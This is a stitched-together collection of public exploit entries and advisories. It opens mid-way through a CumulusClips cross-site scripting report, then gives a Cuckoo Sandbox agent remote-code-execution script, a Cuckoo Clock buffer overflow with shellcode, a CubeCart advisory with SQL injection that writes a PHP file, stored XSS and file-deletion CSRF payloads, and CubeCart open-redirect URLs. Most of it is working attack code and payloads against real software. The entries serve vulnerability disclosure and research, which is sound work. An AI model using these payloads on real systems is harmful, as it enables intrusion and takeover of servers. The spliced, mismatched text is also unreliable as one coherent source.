Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close
RESPONSE:
...
div class="video">
<div class="thumbnail">
<a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
<img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...
Post exploitation:
Since it is possible to steal the cookie and impersonate the admin, the admin panel's unrestricted file upload can then be used to achieve code execution.
Remediation:
Validate input against a whitelist and, more importantly, HTML-encode title, tags and description on output (the response above shows the title echoed raw inside an attribute and into the markup); set the HttpOnly flag on the session cookie.
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection or screenshot.
Such vulnerabilities can be used either to trick the detection system itself,
or potentially to escape the sandbox machine. An attacker could also use such
bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
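def execute(x, cmd="cmd /c start"):
    """Run `cmd` on the Cuckoo guest through the agent's XML-RPC interface.

    Packs a one-file "analyzer" (analyzer.py, which Popen()s `cmd`) into an
    in-memory zip, hands it to add_analyzer() and, if the agent accepted it,
    triggers execute(). The command runs with the privileges of agent.py
    (Administrator on the guest, per the header above).

    Args:
        x: an xmlrpclib.ServerProxy for the agent (default port 8000), or any
           object exposing add_analyzer(data) and execute().
        cmd: command line to launch on the guest.

    Returns:
        The result of x.execute() when the analyzer was accepted, else None.
    """
    import io
    try:
        from xmlrpclib import Binary           # Python 2
    except ImportError:
        from xmlrpc.client import Binary       # Python 3

    # %r emits a properly quoted Python literal, so a cmd containing quotes
    # or backslashes (a Windows path, say) cannot break or alter the
    # generated source the way the original "%s" interpolation could.
    analyzer_source = (
        "import subprocess\n"
        "if __name__ == \"__main__\":\n"
        "    subprocess.Popen(%r, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
        % (cmd,))

    # BytesIO is the correct buffer type for ZipFile on both Python 2 and 3
    # (StringIO only worked because Python 2 str is bytes); `with` makes
    # sure the central directory is written before the buffer is read.
    buffer = io.BytesIO()
    with ZipFile(buffer, "w", ZIP_STORED) as archive:
        info = ZipInfo("analyzer.py")
        info.compress_type = ZIP_DEFLATED
        archive.writestr(info, analyzer_source)

    data = Binary(buffer.getvalue())
    if x.add_analyzer(data):
        return x.execute()
    return None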
if __name__ == "__main__":
    # Talks to the agent on the loopback interface, default port 8000
    # (see the module docstring); no authentication is performed.
    x = xmlrpclib.ServerProxy("http://localhost:8000")
    execute(x, "calc.exe")
    # x.complete()  # "Blackout mode": per the docstring, signals completion so
    #               # no further detection or screenshots occur
# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute
# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes
# EBP overwrite at 256 bytes
# badChars = '\x00\x0d'
# Builds a 1287-byte string laid out per the offsets documented in the header
# comments above (EBP at 256, EIP at 260, ESP payload at 264) and writes it
# to poc.txt. Python 2 syntax: ``print`` statements and str/bytes mixing.
try:
    ebpOffset = '\x41'*256
    ebp = '\x42\x42\x42\x42'
    eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
    # ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
    # ESP points to payload at offset 264 bytes
    # 1019 bytes = Remaining Buffer Length
    # Stack adjustment so the decoder stub below does not overwrite itself.
    fixStack = '\x89\xE5' # mov ebp,esp
    fixStack += '\x83\xEC\x30' # sub esp,byte +0x30
    # root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
    # x86/shikata_ga_nai chosen with final size 216
    shellcode = b""
    shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
    shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
    shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
    shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
    shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
    shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
    shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
    shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
    shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
    shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
    shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
    shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
    shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
    shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
    shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
    shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
    shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
    shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
    shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
    shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68"
    # Pad to the 1287-byte maximum noted in the header.
    Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
    payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
    File = 'poc.txt'
    f = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    # NOTE(review): ``File`` is only bound late in the try block, so a failure
    # before that line would raise NameError here instead of printing.
    print File + ' failed to create'
Advisory ID: HTB23298
Product: CubeCart
Vendor: CubeCart Limited
Vulnerable Version(s): 6.0.10 and probably prior
Tested Version: 6.0.10
Advisory Publication: March 2, 2016 [without technical details]
Vendor Notification: March 2, 2016
Vendor Patch: March 16, 2016
Public Disclosure: March 30, 2016
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
CVSSv3 Base Scores: 6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H], 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N], 4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in the popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise the vulnerable website and its database, and to conduct sophisticated attacks against its users.
1) SQL Injection in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied data passed via the "char" HTTP GET parameter to the "/admin.php" PHP script. A remote authenticated attacker with privileges to view the list of products can alter the existing SQL query and inject and execute arbitrary SQL commands in the application's database. This vulnerability can also be exploited by an anonymous attacker via a CSRF vector.
A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has write permission to this directory), which executes the phpinfo() function:
<img src="http://[host]/admin.php?_g=products&cat_id=1&sort[updated]=DESC&cha
r=T]%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUT
FILE%20'/var/www/site/file.php'%20--%202">
2) Stored Cross-Site Scripting in CubeCart
The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default.
Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator simply visits the "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against its users.
To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile:
<form action="http://[host]/index.php?_a=profile" method="POST" name="f1">
<input type="hidden" name="title" value="title" />
<input type="hidden" name="first_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="last_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="email" value="mail (at) mail (dot) com [email concealed]" />
<input type="hidden" name="phone" value="1234567" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="passold" value="" />
<input type="hidden" name="passnew" value="" />
<input type="hidden" name="passconf" value="" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Submit request" />
</form><script>document.f1.submit();</script>
A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page:
http://[host]/admin.php?_g=customers
3) Cross-Site Request Forgery in CubeCart
The vulnerability exists due to insufficient validation of the HTTP request origin when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with a CSRF exploit, trick a logged-in administrator into visiting the page, spoof the HTTP request as if it were coming from the legitimate user, and delete arbitrary files on the system.
A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below:
http://[host]/admin.php?_g=maintenance&node=index&delete=../index.php
------------------------------------------------------------------------
-----------------------
Solution:
Update to CubeCart 6.0.11
More Information:
https://forums.cubecart.com/topic/51079-cubecart-6011-released/
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
source: https://www.securityfocus.com/bid/51966/info
CubeCart is prone to URI-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
CubeCart 3.0.20 is vulnerable; other versions may also be affected.
http://www.example.com/cube/index.php?act=login&redir=Ly95ZWhnLm5ldC8%3D
http://www.example.com/cube/cart.php?act=reg&redir=L2N1YmUvaW5kZXgucGhwP2FjdD1sb2dpbg%3D%3D